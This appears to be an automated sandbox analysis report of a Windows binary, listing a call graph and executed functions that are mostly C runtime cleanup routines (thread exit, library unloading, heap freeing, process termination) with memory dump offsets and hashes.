                                                                                                    callgraph 0 Function_016BA46A 106 Function_016BA4B4 0->106 111 Function_016BA49B 0->111 1 Function_016D066F 69 Function_016C21E3 1->69 98 Function_016CB4A1 1->98 2 Function_016BA563 88 Function_016BA3D3 2->88 3 Function_016DCC64 61 Function_016DCA11 3->61 4 Function_016C2166 15 Function_016BA84B 4->15 32 Function_016C212F 4->32 63 Function_016C2210 4->63 102 Function_016C1FBE 4->102 5 Function_016C1866 103 Function_016C16B4 5->103 6 Function_016B3460 22 Function_016B9E40 6->22 38 Function_016B9E20 6->38 7 Function_016AD364 25 Function_016AE75F 7->25 8 Function_016BA264 46 Function_016D4737 8->46 65 Function_016BA2EB 8->65 100 Function_016BA2A5 8->100 109 Function_016AEB80 8->109 9 Function_016D477F 10 Function_016DB97B 10->9 11 Function_016D6E7B 11->46 47 Function_016D7033 11->47 81 Function_016D6ECA 11->81 11->109 12 Function_016DBE75 12->3 17 Function_016DC54E 12->17 30 Function_016DC150 12->30 97 Function_016DBAA1 12->97 99 Function_016DCCA3 12->99 13 Function_016B3570 13->38 14 Function_016DBC73 14->3 14->17 14->30 40 Function_016CB23D 14->40 14->97 14->99 15->12 16 Function_016DAF4C 41 Function_016DAF39 16->41 92 Function_016DCAD6 16->92 51 Function_016CB404 17->51 17->98 18 Function_016C2244 19 Function_016C1C45 19->9 20 Function_016DBA47 34 Function_016DBC28 20->34 20->46 20->109 114 Function_016DBA95 20->114 21 Function_016DC946 94 Function_016D27AA 21->94 23 Function_01732A40 23->7 24 Function_016D8B59 26 Function_016D655A 82 Function_016DBDC4 26->82 27 Function_016AFD50 28 Function_016B3550 29 Function_016D6551 29->9 30->24 89 Function_016D64D7 30->89 30->98 31 Function_016E4F50 31->17 53 Function_016E4701 31->53 84 Function_016E50C1 31->84 96 Function_016E42A2 31->96 32->4 85 Function_016BA6DB 32->85 115 Function_016BA693 32->115 33 Function_01732730 66 Function_017327F0 33->66 71 Function_017326E0 33->71 34->31 59 Function_016E511B 34->59 93 Function_016E4ED3 34->93 35 Function_016E4C28 35->17 108 Function_016E4987 35->108 36 Function_016DAF27 37 Function_016AED20 39 Function_016D7123 39->11 87 Function_016AEADD 39->87 101 Function_016AEABA 39->101 40->2 40->5 49 Function_016DEE0C 40->49 68 Function_016C1FE7 40->68 95 Function_016C18AB 40->95 42 Function_016DB935 42->10 42->46 42->109 43 Function_016C1834 43->98 44 Function_0173902B 44->7 45 Function_016C1A35 45->9 47->17 48 Function_016C180C 50 Function_016DD008 50->61 52 Function_016D6503 52->29 52->46 104 Function_016BA2B1 52->104 52->109 53->17 54 Function_016C171C 54->46 54->104 54->109 113 Function_016C179B 54->113 55 Function_016DB91F 56 Function_016BB218 56->14 56->16 56->26 73 Function_016BB3F7 56->73 76 Function_016DCFCD 56->76 56->109 57 Function_016DD11E 57->24 57->89 57->98 58 Function_016AEE19 78 Function_016AEDCC 58->78 74 Function_016E50F2 59->74 60 Function_016AF310 60->1 60->13 60->18 60->28 60->33 64 Function_0173290D 60->64 67 Function_016C10E9 60->67 72 Function_016B33FC 60->72 91 Function_016AF2D0 60->91 105 Function_016B35B0 60->105 118 Function_016B3590 60->118 61->21 80 Function_016BA2CC 61->80 62 Function_016C1710 62->9 63->68 65->39 86 Function_016D73D9 65->86 65->104 65->109 67->17 68->7 68->27 83 Function_016AEDC4 68->83 69->32 70 Function_00F04960 77 Function_016BB2CD 73->77 75 Function_016ADBCA 75->58 76->61 77->50 77->82 79 Function_016C17CA 81->9 82->3 82->17 82->30 82->97 82->99 84->17 84->35 116 Function_016BA891 85->116 88->0 88->8 88->37 88->106 89->52 90 Function_016AF7D0 91->7 92->61 112 Function_016E5098 93->112 95->2 95->9 95->14 95->19 95->43 95->45 95->46 95->48 95->57 95->69 95->79 95->80 95->82 95->90 95->98 95->104 107 Function_016CB48E 95->107 95->109 96->17 97->20 97->42 98->82 99->61 100->9 103->46 103->62 103->109 105->6 107->82 108->17 110 Function_016DAF86 110->41 117 Function_016DCA96 110->117 111->36 111->110 113->9 114->9 116->15 116->40 116->55 117->61

                                                                                                    Executed Functions

                                                                                                    Function 016DC946 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BBD71996,?,016DCA55,?,?,00000000), ref: 016DCA07
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3664257935-537541572
                                                                                                    • Opcode ID: 81dc1961cce3c0710e2073e92b21befb50595e87c3beddb61470dd0979e37021
                                                                                                    • Instruction ID: 83f709dc6cea420b49c49b66f667e8671520ce3fbe32761874e4b002084a5b52
                                                                                                    • Opcode Fuzzy Hash: 81dc1961cce3c0710e2073e92b21befb50595e87c3beddb61470dd0979e37021
                                                                                                    • Instruction Fuzzy Hash: DC219032E01225EBEB329B699C41A6A3B69AF41770B150229F916FB385D730ED11C7D1
                                                                                                    Function 016BB2CD Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 21 16bb2cd-16bb2da call 16dbdc4 24 16bb31a-16bb31d ExitThread 21->24 25 16bb2dc-16bb2e4 21->25 25->24 26 16bb2e6-16bb2ea 25->26 27 16bb2ec call 16dd008 26->27 28 16bb2f1-16bb2f7 26->28 27->28 30 16bb2f9-16bb2fb 28->30 31 16bb304-16bb30a 28->31 30->31 32 16bb2fd-16bb2fe CloseHandle 30->32 31->24 33 16bb30c-16bb30e 31->33 32->31 33->24 34 16bb310-16bb314 FreeLibraryAndExitThread 33->34 34->24
                                                                                                    APIs
                                                                                                      • Part of subcall function 016DBDC4: GetLastError.KERNEL32(00000000,?,016CB4A6,016DC1A2,?,?,016DBCC0,00000001,00000364,?,00000006,000000FF,?,016BB23D,01D15E68,0000000C), ref: 016DBDC8
                                                                                                      • Part of subcall function 016DBDC4: SetLastError.KERNEL32(00000000), ref: 016DBE6A
                                                                                                    • CloseHandle.KERNEL32(?,?,?,016BB404,?,?,016BB276,00000000), ref: 016BB2FE
                                                                                                    • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,016BB404,?,?,016BB276,00000000), ref: 016BB314
                                                                                                    • ExitThread.KERNEL32 ref: 016BB31D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                    • String ID:
                                                                                                    • API String ID: 1991824761-0
                                                                                                    • Opcode ID: ffe63896fdced98e39064e0cba09b4578ecd1f4db90fc70870381d1f569ff9b2
                                                                                                    • Instruction ID: 23e15c747d3d159162f1ab62cc65841e8b4933efa6b9ec2a4434c7c661f1c79b
                                                                                                    • Opcode Fuzzy Hash: ffe63896fdced98e39064e0cba09b4578ecd1f4db90fc70870381d1f569ff9b2
                                                                                                    • Instruction Fuzzy Hash: D5F05E30401611ABEB311E79CC88A9A7EADAF01362F488615FD35E22E5C730D581C791
                                                                                                    Function 016BA46A Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000002,?,016BA464,016CB280,016CB280,?,00000002,BBD71996,016CB280,00000002), ref: 016BA47B
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,016BA464,016CB280,016CB280,?,00000002,BBD71996,016CB280,00000002), ref: 016BA482
                                                                                                    • ExitProcess.KERNEL32 ref: 016BA494
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 5caa76ca4018e7d8fe8f92b33385491b6c37e99b3e7f3beff8d0927267b748b6
                                                                                                    • Instruction ID: 47a2af0717716434e9597db70e9239e6c9cbad10766036e43a74dddab6a86b91
                                                                                                    • Opcode Fuzzy Hash: 5caa76ca4018e7d8fe8f92b33385491b6c37e99b3e7f3beff8d0927267b748b6
                                                                                                    • Instruction Fuzzy Hash: ADD09E31001104AFCF123FA4ED4D99D3F26AF54292B44C015B90957125CB7999A2DB95
                                                                                                    Function 016BB218 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(01D15E68,0000000C), ref: 016BB22B
                                                                                                    • ExitThread.KERNEL32 ref: 016BB232
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611280651-0
                                                                                                    • Opcode ID: 56a6cba27dbf5c744996557e06104bbdb42282dd575cbace9cc2562cb4ae4b4a
                                                                                                    • Instruction ID: 76965034914c526feeb87d1a03c254bedf5d10a46e3a05243514220cd32f1b48
                                                                                                    • Opcode Fuzzy Hash: 56a6cba27dbf5c744996557e06104bbdb42282dd575cbace9cc2562cb4ae4b4a
                                                                                                    • Instruction Fuzzy Hash: 0CF0C2B1D00206AFDB12AFB4CC48EBE3B72FF91251F20458DE4019B295CB745941CBA5
                                                                                                    Function 016DC54E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 61 16dc54e-16dc557 62 16dc559-16dc56c RtlFreeHeap 61->62 63 16dc586-16dc587 61->63 62->63 64 16dc56e-16dc585 GetLastError call 16cb404 call 16cb4a1 62->64 64->63
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000000,?,016E49A0,?,00000000,?,?,016E4C41,?,00000007,?,?,016E50E7,?,?), ref: 016DC564
                                                                                                    • GetLastError.KERNEL32(?,?,016E49A0,?,00000000,?,?,016E4C41,?,00000007,?,?,016E50E7,?,?), ref: 016DC56F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2551805234.0000000000DE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2551668024.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000173C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001755000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000176D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001826000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001894000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000018AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001909000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.000000000196A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.00000000019D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AA9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001AF6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2554218547.0000000001CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2560993757.0000000001D1A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561662999.0000000001D28000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561700282.0000000001D2B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001D79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2561724024.0000000001DB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.0000000001DB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000027B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2562339066.00000000031B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_de0000_Merge.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 8369c85064e43f0b27dc36aed785f1b04b74aa26a2f5f56b1eb12847ee8c23eb
                                                                                                    • Instruction ID: 8e0be500849d2ee203909315798ccd85d0c5975137d08f0d87c1fc74c6ccf39d
                                                                                                    • Opcode Fuzzy Hash: 8369c85064e43f0b27dc36aed785f1b04b74aa26a2f5f56b1eb12847ee8c23eb
                                                                                                    • Instruction Fuzzy Hash: 2DE0CD31500214E7DB322FF4EC09B597B6DEF407E2F54802DF60896154DB308550D788
                                                                                                    Function 016DCA11 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
